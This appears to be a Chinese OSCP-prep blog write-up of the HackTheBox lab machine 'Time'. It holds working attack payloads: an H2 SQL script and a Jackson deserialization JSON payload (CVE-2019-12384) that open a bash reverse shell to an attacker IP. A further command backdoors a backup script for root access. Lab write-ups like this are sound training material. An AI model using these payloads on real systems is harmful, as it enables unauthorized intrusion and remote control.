OSCP备考_0x34_HackThBox靶机_time

Ethan医生2周前靶场26

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.107.34  (扫描UDP)


image.png


gobuster dir -u http://10.129.107.34 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt.html

image.png



image.png

仔细看错误信息 然后进行突破

Google搜索 com.fasterxml.jackson.core 发现存在RCE

利用方式
https://github.com/jas502n/CVE-2019-12384
创建一个t.sql文件,内容如下



CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {

        String[] command = {"bash", "-c", cmd};

        java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");

        return s.hasNext() ? s.next() : "";  }

$$;

CALL SHELLEXEC('bash -i >& /dev/tcp/10.10.16.38/3333 0>&1')


开启http服务后,在网页输入框中执行如下命令

["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.16.38:8000/t.sql'"}]

image.png

上传linpeas.sh文件至目标机器
发现一个权限可疑的备份脚本


echo -e '\nbash -i >& /dev/tcp/10.10.16.38/3334 0>&1' >> /usr/bin/timer_backup.sh

由于一下就断开 直接上传SSH PUB 使用SSH登入

image.png

image.png

标签: OSCP

相关文章

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

OSCP备考_0x06_Vulnhub靶机_Tr0ll: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/tr0ll-1,100/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x06_HackThBox靶机_Linux_Sense

OSCP备考_0x06_HackThBox靶机_Linux_Sense

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

OSCP备考_0x55_HackThBox靶机_Windows_Fuse

fusenmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.2.5 (扫描TCP)nslookup fabricorp.local ...

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

OSCP备考_0x08_HackThBox靶机_Linux_Valentine

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)nmap -sU --top-ports 100 10.129.3.15...

OSCP备考_0x43_HackThBox靶机_Windows_arctic

OSCP备考_0x43_HackThBox靶机_Windows_arctic

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.249.241 (扫描TCP)http://10.129.249.241:8500/CF...

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。